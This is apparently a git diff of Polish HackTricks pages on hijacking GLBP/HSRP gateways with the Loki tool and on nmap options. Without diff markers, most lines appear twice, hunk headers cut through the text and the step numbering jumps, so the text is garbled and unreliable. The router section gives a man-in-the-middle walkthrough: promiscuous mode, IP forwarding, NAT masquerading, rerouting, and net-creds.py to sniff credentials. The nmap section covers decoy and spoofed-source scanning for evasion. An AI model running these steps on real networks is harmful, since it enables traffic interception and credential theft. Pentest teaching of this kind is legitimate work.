GLBP wyróżnia się umożliwieniem dystrybucji obciążenia między routerami za pomocą jednego wirtualnego IP w połączeniu z wieloma wirtualnymi adresami MAC. W grupie GLBP każdy router bierze udział w przekazywaniu pakietów. W odróżnieniu od HSRP/VRRP, GLBP oferuje rzeczywiste równoważenie obciążenia poprzez kilka mechanizmów:
- **Równoważenie Obciążenia Zależne od Hosta:** Zapewnia stałe przypisanie adresu MAC AVF do hosta, co jest istotne dla stabilnych konfiguracji NAT.
- **Równoważenie Obciążenia Round-Robin:** Domyślne podejście, polegające na zmianie przypisania adresu MAC AVF między żądającymi hostami.
- **Równoważenie Obciążenia Ważone Round-Robin:** Rozkłada obciążenie na podstawie zdefiniowanych metryk "Waga".
- **Równoważenie Obciążenia Ważone Round-Robin:** Dystrybuuje obciążenie na podstawie zdefiniowanych metryk "Waga".
### Kluczowe Składniki i Terminologia w GLBP
- **AVG (Aktywna Wirtualna Bramka):** Główny router odpowiedzialny za przydzielanie adresów MAC do routerów równorzędnych.
- **AVF (Aktywny Wirtualny Przekierowujący):** Router wyznaczony do zarządzania ruchem sieciowym.
- **Priorytet GLBP:** Metryka określająca AVG, zaczynająca się od domyślnej wartości 100 i w zakresie od 1 do 255.
- **Waga GLBP:** Odzwierciedla obecne obciążenie routera, regulowana ręcznie lub poprzez Śledzenie Obiektów.
- **Priorytet GLBP:** Metryka określająca AVG, zaczynająca się od domyślnego wartości 100 i wahająca się od 1 do 255.
- **Waga GLBP:** Odzwierciedla obecne obciążenie routera, regulowane ręcznie lub poprzez Śledzenie Obiektów.
- **Wirtualny Adres IP GLBP:** Służy jako domyślna brama sieciowa dla wszystkich podłączonych urządzeń.
Do interakcji GLBP używa zarezerwowanego adresu multicastowego 224.0.0.102 i portu UDP 3222. Routery wysyłają pakiety "hello" co 3 sekundy i uznawane są za nieoperacyjne, jeśli pakiet zostanie pominięty przez okres 10 sekund.
Do interakcji GLBP używa zarezerwowanego adresu multicastowego 224.0.0.102 i portu UDP 3222. Routery wysyłają pakiety "hello" co 3 sekundy i uważane są za nieoperacyjne, jeśli pakiet zostanie pominięty przez okres 10 sekund.
### Mechanizm Ataku GLBP
Atakujący może stać się głównym routerem, wysyłając pakiet GLBP z najwyższą wartością priorytetu (255). Może to prowadzić do ataków typu DoS lub MITM, umożliwiając przechwycenie lub przekierowanie ruchu.
Atakujący może stać się głównym routerem, wysyłając pakiet GLBP z najwyższą wartością priorytetu (255). Może to prowadzić do ataków typu DoS lub MITM, umożliwiając przechwytywanie lub przekierowywanie ruchu.
### Wykonanie Ataku GLBP za pomocą Loki
[Loki](https://github.com/raizo62/loki_on_kali) może przeprowadzić atak GLBP poprzez wstrzyknięcie pakietu z ustawionym priorytetem i wagą na 255. Kroki przed atakiem obejmują zbieranie informacji, takich jak wirtualny adres IP, obecność uwierzytelnienia i wartości priorytetu routera, za pomocą narzędzi takich jak Wireshark.
[Loki](https://github.com/raizo62/loki_on_kali) może przeprowadzić atak GLBP poprzez wstrzyknięcie pakietu z ustawionym priorytetem i wagą na 255. Kroki przed atakiem obejmują zbieranie informacji, takich jak wirtualny adres IP, obecność uwierzytelnienia i wartości priorytetu routera za pomocą narzędzi takich jak Wireshark.
Kroki Ataku:
1. Przełącz się w tryb promiskuitywny i włącz przekazywanie IP.
@ -57,9 +57,9 @@ Kroki Ataku:
6. Wdroż SNAT dla pełnej widoczności ruchu.
7. Dostosuj trasowanie, aby zapewnić ciągły dostęp do internetu poprzez oryginalny router AVG.
Śledząc te kroki, atakujący umieszcza się jako "człowiek pośrodku", zdolny do przechwytywania i analizowania ruchu sieciowego, w tym danych niezaszyfrowanych lub wrażliwych.
Śledząc te kroki, atakujący pozycjonuje się jako "człowiek pośrodku", zdolny do przechwytywania i analizowania ruchu sieciowego, w tym danych niezaszyfrowanych lub wrażliwych.
Poniżej znajdują się wymagane fragmenty poleceń do demonstracji:
Dla celów demonstracyjnych, oto wymagane fragmenty poleceń:
```bash
# Enable promiscuous mode and IP forwarding
sudo ip link set eth0 promisc on
@ -114,7 +114,7 @@ sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1
```
3. Użyj Lokiego, aby zaatakować określony router, wprowadź odszyfrowane hasło HSRP i wykonaj niezbędne konfiguracje do podszywania się pod Aktywnego Routera.
4. Po przejęciu roli Aktywnego Routera skonfiguruj interfejs sieciowy i tabele IP, aby przechwycić legalny ruch.
4. Po przejęciu roli Aktywnego Routera skonfiguruj interfejs sieciowy i tabele IP, aby przechwycić prawidłowy ruch.
```shell
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
@ -129,26 +129,4 @@ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
sudo python2 net-creds.py -i eth0
```
Wykonanie tych kroków umieszcza atakującego w pozycji do przechwytywania i manipulowania ruchem, podobnie jak w przypadku przejęcia GLBP. Podkreśla to podatność protokołów redundancji, takich jak HSRP, oraz konieczność stosowania solidnych środków bezpieczeństwa.
## Referencje
- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
<details>
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**Grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
Wykonanie tych kroków umieszcza atakującego w pozycji do przechwytywania i manipulowania ruchem, podobnie jak w przypadku przejęcia GLBP. Podkreśla to podatność protokołów redundancji, takich jak HSRP, oraz potrzebę solidnych środków bezpieczeństwa.

98
generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md
View file

@ -2,11 +2,11 @@
<details>
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Zacznij od zera i stań się ekspertem od hakowania AWS dzięki</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną na HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
@ -14,7 +14,7 @@ Inne sposoby wsparcia HackTricks:
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
```
@ -24,24 +24,24 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
### Adresy IP do skanowania
* **`<ip>,<net/mask>`:** Wskazuje bezpośrednio adresy IP.
* **`<ip>,<net/mask>`:** Wskazuje bezpośrednio adresy IP
* **`-iL <ips_file>`:** list\_IPs
* **`-iR <number>`**: Liczba losowych adresów IP, można wykluczyć możliwe adresy IP za pomocą `--exclude <Ips>` lub `--excludefile <file>`.
### Odkrywanie urządzeń
### Odkrywanie sprzętu
Domyślnie Nmap uruchamia fazę odkrywania składającą się z: `-PA80 -PS443 -PE -PP`
* **`-sL`**: Nieinwazyjne, wyświetla cele, wysyłając żądania **DNS** w celu rozwiązania nazw. Jest przydatne, aby dowiedzieć się, czy na przykład www.prueba.es/24 wszystkie adresy IP są naszymi celami.
* **`-Pn`**: **Brak pinga**. Jest to przydatne, jeśli wiesz, że wszystkie są aktywne (w przeciwnym razie możesz stracić dużo czasu, ale ta opcja również generuje fałszywe negatywy mówiąc, że nie są aktywne), zapobiega fazie odkrywania.
* **`-Pn`**: **Brak pinga**. Jest to przydatne, jeśli wiesz, że wszystkie z nich są aktywne (jeśli nie, możesz stracić dużo czasu, ale ta opcja również generuje fałszywe negatywy mówiąc, że nie są aktywne), zapobiega fazie odkrywania.
* **`-sn`** : **Brak skanowania portów**. Po zakończeniu fazy rozpoznawczej nie skanuje portów. Jest stosunkowo dyskretny i pozwala na mały skan sieci. Z uprawnieniami wysyła ACK (-PA) do 80, SYN(-PS) do 443 oraz żądanie echo i żądanie znacznika czasu, bez uprawnień zawsze kończy połączenia. Jeśli celem jest sieć, używa tylko ARP(-PR). Jeśli jest używany z inną opcją, odrzucane są tylko pakiety z innej opcji.
* **`-PR`**: **Ping ARP**. Jest używany domyślnie podczas analizy komputerów w naszej sieci, jest szybszy niż użycie pingów. Jeśli nie chcesz używać pakietów ARP, użyj `--send-ip`.
* **`-PS <ports>`**: Wysyła pakiety SYN, na które jeśli odpowiada SYN/ACK, jest otwarty (jeśli odpowiada RST, aby nie zakończyć połączenia), jeśli odpowiada RST, jest zamknięty, a jeśli nie odpowiada, jest nieosiągalny. W przypadku braku uprawnień automatycznie używane jest pełne połączenie. Jeśli nie podano portów, wysyła je do 80.
* **`-PA <ports>`**: Jak poprzedni, ale z ACK, łącząc oba daje lepsze wyniki.
* **`-PU <ports>`**: Celem jest przeciwny, są wysyłane do portów, które powinny być zamknięte. Niektóre firewalle sprawdzają tylko połączenia TCP. Jeśli jest zamknięty, odpowiada portem nieosiągalnym, jeśli odpowiada innym icmp lub nie odpowiada, jest pozostawiony jako nieosiągalny.
* **`-PE, -PP, -PM`** : PINGI ICMP: odpowiedź echo, znacznik czasu i maska adresu. Są wysyłane, aby dowiedzieć się, czy cel jest aktywny.
* **`-PY<ports>`**: Wysyła sondy SCTP INIT do 80 domyślnie, INIT-ACK(otwarty) lub ABORT(zamknięty) lub nic albo ICMP nieosiągalny(nieaktywny) mogą być odpowiedziane.
* **`-PO <protocols>`**: W nagłówkach wskazany jest protokół, domyślnie 1(ICMP), 2(IGMP) i 4(Encap IP). Dla protokołów ICMP, IGMP, TCP (6) i UDP (17) wysyłane są nagłówki protokołów, dla reszty wysyłany jest tylko nagłówek IP. Celem tego jest to, że z powodu zniekształcenia nagłówków, odpowiedzi na niedostępny protokół lub odpowiedzi tego samego protokołu są wysyłane, aby dowiedzieć się, czy jest aktywny.
* **`-PA <ports>`**: Jak poprzednia opcja, ale z ACK, łącząc obie daje lepsze wyniki.
* **`-PU <ports>`**: Celem jest przeciwny, są wysyłane do portów, które spodziewają się być zamknięte. Niektóre zapory sieciowe sprawdzają tylko połączenia TCP. Jeśli jest zamknięty, odpowiada portem nieosiągalnym, jeśli odpowiada innym icmp lub nie odpowiada, pozostaje jako nieosiągalny cel.
* **`-PE, -PP, -PM`** : PINGI ICMP: odpowiedź echo, znacznik czasu i maska adresu. Są one wysyłane, aby dowiedzieć się, czy cel jest aktywny.
* **`-PY<ports>`**: Wysyła sondy SCTP INIT do 80 domyślnie, INIT-ACK(otwarte) lub ABORT(zamknięte) lub nic albo ICMP nieosiągalny(nieaktywny) mogą być odpowiedziane.
* **`-PO <protocols>`**: W nagłówkach wskazany jest protokół, domyślnie 1(ICMP), 2(IGMP) i 4(Encap IP). Dla protokołów ICMP, IGMP, TCP (6) i UDP (17) wysyłane są nagłówki protokołów, dla reszty wysyłany jest tylko nagłówek IP. Celem tego jest to, że z powodu zniekształcenia nagłówków, odpowiedzi na nieosiągalny protokół lub odpowiedzi tego samego protokołu są wysyłane, aby dowiedzieć się, czy jest aktywny.
* **`-n`**: Brak DNS
* **`-R`**: Zawsze DNS
@ -49,29 +49,29 @@ Domyślnie Nmap uruchamia fazę odkrywania składającą się z: `-PA80 -PS443 -
* **`-sS`**: Nie kończy połączenia, więc nie pozostawia śladu, bardzo dobre, jeśli można go użyć (uprawnienia). Jest używany domyślnie.
* **`-sT`**: Kończy połączenie, więc pozostawia ślad, ale można go użyć z pewnością. Domyślnie bez uprawnień.
* **`-sU`**: Wolniejszy, dla UDP. Głównie: DNS(53), SNMP(161,162), DHCP(67 i 68), (-sU53,161,162,67,68): otwarty(odpowiedź), zamknięty(port nieosiągalny), odfiltrowany (inny ICMP), otwarty/odfiltrowany (nic). W przypadku otwarto/odfiltrowany, -sV wysyła liczne żądania, aby wykryć któreś z wersji obsługiwanych przez nmap i może wykryć prawdziwy stan. Znacznie zwiększa czas.
* **`-sU`**: Wolniejsze, dla UDP. Głównie: DNS(53), SNMP(161,162), DHCP(67 i 68), (-sU53,161,162,67,68): otwarte(odpowiedź), zamknięte(port nieosiągalny), filtrowane (inny ICMP), otwarte/filtrowane (nic). W przypadku otwarto/filtrowane, -sV wysyła liczne żądania, aby wykryć jedną z wersji obsługiwanych przez nmap i może wykryć prawdziwy stan. Znacznie zwiększa czas.
* **`-sY`**: Protokół SCTP nie udaje się nawiązać połączenia, więc nie ma logów, działa jak -PY
* **`-sN,-sX,-sF`:** Null, Fin, Xmas, mogą przenikać przez niektóre firewalle i wydobywać informacje. Oparte są na fakcie, że zgodne z normą maszyny powinny odpowiadać RST na wszystkie żądania, które nie mają podniesionych flag SYN, RST lub ACK: otwarty/odfiltrowany(nic), zamknięty(RST), odfiltrowany (ICMP nieosiągalny). Niepewne w przypadku systemów Windows, CIsco, BSDI i OS/400. W systemach Unix tak.
* **`-sN,-sX,-sF`:** Null, Fin, Xmas, mogą przenikać przez niektóre zapory sieciowe i wydobywać informacje. Opierają się na tym, że zgodne z normą maszyny powinny odpowiadać RST na wszystkie żądania, które nie mają podniesionych flag SYN, RST lub ACK: otwarte/filtrowane(nic), zamknięte(RST), filtrowane (ICMP nieosiągalny). Niepewne w przypadku systemów Windows, CIsco, BSDI i OS/400. W systemach Unix tak.
* **`-sM`**: Skan Maimon: Wysyła flagi FIN i ACK, używane dla BSD, obecnie zwróci wszystko jako zamknięte.
* **`-sA, sW`**: ACK i Window, służy do wykrywania firewalle, aby dowiedzieć się, czy porty są odfiltrowane czy nie. -sW rozróżnia między otwartymi/zamkniętymi, ponieważ otwarte odpowiadają inną wartością okna: otwarty (RST z oknem innym niż 0), zamknięty (RST z oknem = 0), odfiltrowany (ICMP nieosiągalny lub nic). Nie wszystkie komputery działają w ten sposób, więc jeśli wszystkie są zamknięte, to nie działa, jeśli kilka jest otwartych, to działa dobrze, a jeśli jest wiele otwartych i niewiele zamkniętych, to działa odwrotnie.
* **`-sI`:** Skan bezczynności. W przypadkach, gdy istnieje aktywny firewall, ale wiemy, że nie filtrowuje do określonego adresu IP (lub gdy po prostu chcemy zachować anonimowość), możemy użyć skanera zombie (działa dla wszystkich portów), aby znaleźć możliwe zombi, możemy użyć skryptu ipidseq lub eksploatacji pomocniczej/skaner/ip/ipidseq. Ten skaner opiera się na numerze IPID pakietów IP.
* **`--badsum`:** Wysyła błędne sumy, komputery odrzuciłyby pakiety, ale firewalle mogą odpowiedzieć czymś, służy do wykrywania firewalle.
* **`-sZ`:** "Dziwny" skaner SCTP, podczas wysyłania sond z fragmentami echo cookie powinny być odrzucane, jeśli są otwarte lub odpowiedziane ABORT, jeśli są zamknięte. Może przechodzić przez firewalle, przez które nie przechodzi init, złe jest to, że nie rozróżnia między odfiltrowanymi i otwartymi.
* **`-sO`:** Skan protokołu Ip. Wysyła złe i puste nagłówki, w których czasami nawet protokół nie może być odróżniony. Jeśli dotrze nieosiągalny protokół ICMP, jest zamknięty, jeśli dotrze nieosiągalny port, jest otwarty, jeśli dotrze inny błąd, jest odfiltrowany, jeśli nic nie dotrze, jest otwarty|odfiltrowany.
* **`-sA, sW`**: ACK i Window, służy do wykrywania zapór sieciowych, aby dowiedzieć się, czy porty są filtrowane czy nie. -sW rozróżnia między otwartymi/zamkniętymi, ponieważ otwarte odpowiadają inną wartością okna: otwarte (RST z oknem innym niż 0), zamknięte (RST z oknem = 0), filtrowane (ICMP nieosiągalny lub nic). Nie wszystkie komputery działają w ten sposób, więc jeśli wszystko jest zamknięte, to nie działa, jeśli kilka jest otwartych, to działa dobrze, a jeśli jest wiele otwartych i kilka zamkniętych, to działa odwrotnie.
* **`-sI`:** Skan bezczynności. W przypadkach, gdy istnieje aktywna zapora sieciowa, ale wiemy, że nie filtrowuje do określonego adresu IP (lub gdy po prostu chcemy zachować anonimowość), możemy użyć skanera zombie (działa dla wszystkich portów), aby znaleźć możliwe zombi, możemy użyć skryptu ipidseq lub eksploatacji pomocniczej/skanera/ip/ipidseq. Ten skaner opiera się na numerze IPID pakietów IP.
* **`--badsum`:** Wysyła błędne sumy, komputery odrzuciłyby pakiety, ale zapory sieciowe mogą odpowiedzieć czymś, służy do wykrywania zapór sieciowych.
* **`-sZ`:** "Dziwny" skaner SCTP, podczas wysyłania sond z fragmentami echo cookie powinny być odrzucane, jeśli są otwarte lub odpowiedziane ABORT, jeśli są zamknięte. Może przechodzić przez zapory sieciowe, przez które nie przechodzi inicjacja, złe jest to, że nie rozróżnia między filtrowanymi i otwartymi.
* **`-sO`:** Skan protokołu Ip. Wysyła złe i puste nagłówki, w których czasami nawet protokół nie może być odróżniony. Jeśli dotrze nieosiągalny protokół ICMP, jest zamknięty, jeśli dotrze nieosiągalny port, jest otwarty, jeśli dotrze inny błąd, jest filtrowany, jeśli nic nie dotrze, jest otwarty|filtrowany.
* **`-b <server>`:** FTPhost--> Służy do skanowania hosta z innego, jest to robione poprzez połączenie z ftp innego komputera i proszenie go o wysłanie plików do portów, które chcesz zeskanować z innego komputera, na podstawie odpowiedzi dowiemy się, czy są otwarte czy nie. \[\<user>:\<password>@]\<server>\[:\<port>] Prawie wszystkie serwery ftp już nie pozwalają na to, dlatego jest to mało praktyczne.
### **Centrowanie analizy**
**-p:** Służy do określenia skanowanych portów. Aby wybrać 65335: **-p-** lub **-p all**. Nmap ma wewnętrzną klasyfikację według popularności. Domyślnie używa 1000 głównych portów. Z **-F** (szybkie skanowanie) analizuje 100 głównych portów. Z **--top-ports \<numero>** Analizuje tę liczbę głównych portów (od 1 do 65335). Sprawdza porty w losowej kolejności, aby tego uniknąć **-r**. Możemy również wybrać porty: 20-30,80,443,1024- To ostatnie oznacza, że sprawdza od 1024 w górę. Możemy również grupować porty według protokołów: U:53,T:21-25,80,139,S:9. Możemy również wybrać zakres wśród popularnych portów nmap: -p \[-1024] analizuje do 1024 z tych zawartych w nmap-services. **--port-ratio \<ratio>** Analizuje najczęściej używane porty z określonym współczynnikiem, który powinien być między 0 a 1.
**-p:** Służy do określenia skanowanych portów. Aby wybrać 65335: **-p-** lub **-p all**. Nmap ma wewnętrzną klasyfikację według popularności. Domyślnie używa 1000 głównych portów. Z **-F** (szybkie skanowanie) analizuje 100 głównych portów. Z **--top-ports \<numero>** Analizuje tę liczbę głównych portów (od 1 do 65335). Sprawdza porty w losowej kolejności, aby tego uniknąć **-r**. Możemy również wybrać porty: 20-30,80,443,1024- To ostatnie oznacza, że patrzy w przód od 1024. Możemy również grupować porty według protokołów: U:53,T:21-25,80,139,S:9. Możemy również wybrać zakres wśród popularnych portów nmap: -p \[-1024] analizuje do 1024 z tych zawartych w nmap-services. **--port-ratio \<ratio>** Analizuje najczęściej używane porty z określonym współczynnikiem, który powinien być między 0 a 1
**-sV** Skanowanie wersji, intensywność można regulować od 0 do 9, domyślnie 7.
**-sV** Skanowanie wersji, można regulować intensywność od 0 do 9, domyślnie 7.
**--version-intensity \<numero>** Reguluje intensywność, im niższa, tym tylko najbardziej prawdopodobne sondy zostaną wysłane, ale nie wszystkie. Dzięki temu możemy znacznie skrócić czas skanowania UDP.
**--version-intensity \<numero>** Reguluje intensywność, im niższa, tym tylko najbardziej prawdopodobne sondy są wysyłane, ale nie wszystkie. Dzięki temu możemy znacznie skrócić czas skanowania UDP
**-O** Wykrywanie systemu operacyjnego
**--osscan-limit** Aby dobrze zeskanować hosta, potrzebny jest co najmniej jeden otwarty i jeden zamknięty port, jeśli ta zasada nie jest spełniona i użyliśmy tego, nie próbuje przewidywać systemu operacyjnego (oszczędza czas)
**--osscan-guess** Gdy wykrycie systemu operacyjnego nie jest idealne, ta opcja zmusza do większego wysiłku.
**--osscan-limit** Aby dobrze zeskanować hosta, potrzebne jest, aby co najmniej jeden port był otwarty, a drugi zamknięty, jeśli ta zasada nie jest spełniona i użyliśmy tego, nie próbuje przewidywać systemu operacyjnego (oszczędza czas)
**--osscan-guess** Gdy wykrycie systemu operacyjnego nie jest idealne, to sprawia, że nmap się bardziej stara
**Skrypty**
@ -81,15 +81,15 @@ Domyślnie można użyć -sC lub --script=default
Dostępne kategorie to: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version i vuln
* **Auth:** uruchamia wszystkie dostępne skrypty autoryzacyjne
* **Default:** uruchamia podstawowe skrypty domyślne narzędzia
* **Auth:** wykonuje wszystkie dostępne skrypty autoryzacyjne
* **Default:** wykonuje podstawowe skrypty domyślne narzędzia
* **Discovery:** pozyskuje informacje o celu
* **External:** skrypt do korzystania z zewnętrznych zasobów
* **Intrusive:** używa skryptów uznawanych za inwazyjne dla celu
* **Malware:** sprawdza, czy istnieją otwarte połączenia złośliwych kodów lub tylnych drzwi (backdoors)
* **Safe:** uruchamia skrypty, które nie są inwazyjne
* **Safe:** wykonuje skrypty, które nie są inwazyjne
* **Vuln:** odkrywa najbardziej znane podatności
* **All:** uruchamia wszystkie dostępne skrypty NSE
* **All:** wykonuje wszystkie dostępne skrypty NSE
Aby wyszukać skrypty:
@ -109,29 +109,29 @@ Aby wyszukać skrypty:
\--script-help _\<nazwapliku>_|_\<kategoria>_|_\<katalog>_|_\<wyrażenie>_|all\[,...]
\--script-trace ---> Udostępnia informacje o działaniu skryptu
\--script-trace ---> Udziela informacji o działaniu skryptu
\--script-updatedb
**Aby użyć skryptu, wystarczy wpisać: nmap --script Nazwa\_skryptu cel** --> Po wpisaniu skryptu zostanie uruchomiony zarówno skrypt, jak i skaner, więc można również dodawać opcje skanera, można dodać **“safe=1”** aby uruchomić tylko te, które są bezpieczne.
**Aby użyć skryptu, wystarczy wpisać: nmap --script Nazwa\_skryptu cel** --> Po wpisaniu skryptu zostanie wykonany zarówno skrypt, jak i skaner, więc można również dodawać opcje skanera, można dodać **"safe=1"** aby wykonać tylko te, które są bezpieczne.
**Kontrola czasu**
**Nmap może zmieniać czas w sekundach, minutach, ms:** --host-timeout arguments 900000ms, 900, 900s, and 15m all do the same thing.
Nmap dzieli łączną liczbę hostów do zeskanowania na grupy i analizuje te grupy blokami, tak że dopóki wszystkie nie zostaną zanalizowane, nie przechodzi do następnego bloku (i użytkownik nie otrzymuje aktualizacji, dopóki blok nie zostanie zanalizowany). Dlatego dla nmapa bardziej optymalne jest używanie dużych grup. Domyślnie w klasie C używa 256.
Nmap dzieli łączną liczbę hostów do zeskanowania na grupy i analizuje te grupy blokami, dopóki nie zostaną zeskanowane wszystkie, nie przechodzi do następnego bloku (i użytkownik nie otrzymuje aktualizacji, dopóki blok nie zostanie zeskanowany). Dlatego dla nmapa bardziej optymalne jest używanie dużych grup. Domyślnie w klasie C używa 256.
Można to zmienić za pomocą\*\*--min-hostgroup\*\* _**\<numhosts>**_**;** **--max-hostgroup** _**\<numhosts>**_ (Dostosuj rozmiary grup skanowania równoległego)
Można zmienić za pomocą\*\*--min-hostgroup\*\* _**\<numhosts>**_**;** **--max-hostgroup** _**\<numhosts>**_ (Dostosuj rozmiary grup skanowania równoległego)
Można kontrolować liczbę skanerów równoległych, ale lepiej tego nie robić (nmap ma już wbudowany automatyczny kontroler na podstawie stanu sieci): **--min-parallelism** _**\<numprobes>**_**;** **--max-parallelism** _**\<numprobes>**_
Można kontrolować liczbę skanerów równoległych, ale lepiej tego nie robić (nmap ma już wbudowaną kontrolę automatyczną na podstawie stanu sieci): **--min-parallelism** _**\<numprobes>**_**;** **--max-parallelism** _**\<numprobes>**_
Można zmienić czas oczekiwania na rtt, ale zazwyczaj nie jest to konieczne: **--min-rtt-timeout** _**\<time>**_**,** **--max-rtt-timeout** _**\<time>**_**,** **--initial-rtt-timeout** _**\<time>**_
Można zmienić limit czasu rtt, ale zazwyczaj nie jest to konieczne: **--min-rtt-timeout** _**\<time>**_**,** **--max-rtt-timeout** _**\<time>**_**,** **--initial-rtt-timeout** _**\<time>**_
Można zmienić liczbę prób:**--max-retries** _**\<numtries>**_
Można zmienić czas skanowania hosta: **--host-timeout** _**\<time>**_
Można zmienić czas między każdym testem, aby działać wolniej: **--scan-delay** _**\<time>**_**;** **--max-scan-delay** _**\<time>**_
Można zmienić czas między każdym skanowaniem, aby działać wolniej: **--scan-delay** _**\<time>**_**;** **--max-scan-delay** _**\<time>**_
Można zmienić liczbę pakietów na sekundę: **--min-rate** _**\<number>**_**;** **--max-rate** _**\<number>**_
@ -143,9 +143,9 @@ Aby określić, jak agresywne ma być nmap: -T paranoid|sneaky|polite|normal|agg
\-T0 --> Skanuje tylko 1 port na raz i czeka 5 minut przed kolejnym
\-T1 i T2 --> Bardzo podobne, ale czekają tylko 15 i 0,4 sekundy między każdym testem
\-T1 i T2 --> Bardzo podobne, ale czekają tylko 15 i 0,4 sekundy między każdym skanowaniem
\-T3 --> Działanie domyślne, obejmuje równoległe działanie
\-T3 --> Działanie domyślne, obejmuje równoległe skanowanie
\-T4 --> --max-rtt-timeout 1250ms --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --max-retries 6 --max-scan-delay 10ms
@ -155,13 +155,13 @@ Aby określić, jak agresywne ma być nmap: -T paranoid|sneaky|polite|normal|agg
Blokuje porty i analizuje pakiety.
**-f** Do fragmentacji pakietów, domyślnie fragmentuje je co 8 bajtów po nagłówku, aby określić ten rozmiar używamy ..mtu (wtedy nie używamy -f), przesunięcie musi być wielokrotnością 8. **Skanery wersji i skrypty nie obsługują fragmentacji**
**-f** Do fragmentacji pakietów, domyślnie fragmentuje je co 8 bajtów po nagłówku, aby określić ten rozmiar, używamy ..mtu (wtedy nie używamy -f), przesunięcie musi być wielokrotnością 8. **Skanery wersji i skrypty nie obsługują fragmentacji**
**-D decoy1,decoy2,ME** Nmap wysyła skanery, ale z innymi adresami IP jako źródłowymi, w ten sposób ukrywasz s. Jeśli dodasz ME do listy, nmap umieści cię tam, lepiej dodać 5 lub 6 przed tobą, aby całkowicie ukryć swoją tożsamość. Można generować losowe adresy IP z RND:\<numer> Aby wygenerować \<numer> losowych adresów IP. Nie działają z wykrywaniem wersji bez połączenia TCP. Jeśli jesteś w sieci, lepiej użyć aktywnych adresów IP, w przeciwnym razie będzie łatwo ustalić, że jesteś jedynym aktywnym.
**-D decoy1,decoy2,ME** Nmap wysyła skanery, ale z innymi adresami IP jako źródłowymi, w ten sposób ukrywasz swoje. Jeśli dodasz ME do listy, nmap umieści cię tam, lepiej dodać 5 lub 6 przed tobą, aby całkowicie ukryć swoją tożsamość. Można generować losowe adresy IP za pomocą RND:\<numer> Aby wygenerować \<numer> losowych adresów IP. Nie działają z wykrywaniem wersji bez połączenia TCP. Jeśli jesteś w sieci, lepiej użyć aktywnych adresów IP, w przeciwnym razie będzie łatwo ustalić, że jesteś jedynym aktywnym.
Aby użyć losowych adresów IP: nmap-D RND: 10 Cel\_IP
**-S IP** Gdy Nmap nie wykrywa twojego adresu IP, musisz go podać. Może również sprawić, że wydaje się, że inny cel skanuje ich.
**-S IP** Gdy Nmap nie wykrywa twojego adresu IP, musisz go podać za pomocą tego. Może również sprawić, że wydaje się, że inny cel skanuje ich.
**-e \<interfejs>** Do wyboru interfejsu
@ -171,7 +171,7 @@ Wielu administratorów pozostawia otwarte porty wejściowe, aby wszystko działa
**--data-string** _**\<ciąg>**_ Do wysyłania zwykłego tekstu: --data-string "Skan przeprowadzony przez Security Ops, numer wewnętrzny 7192"
**--data-length** _**\<liczba>**_ Nmap wysyła tylko nagłówki, dzięki temu dodajemy określoną liczbę dodatkowych bajtów (które zostaną wygenerowane losowo)
**--data-length** _**\<liczba>**_ Nmap wysyła tylko nagłówki, dzięki temu dodajemy do nich określoną liczbę dodatkowych bajtów (które zostaną wygenerowane losowo)
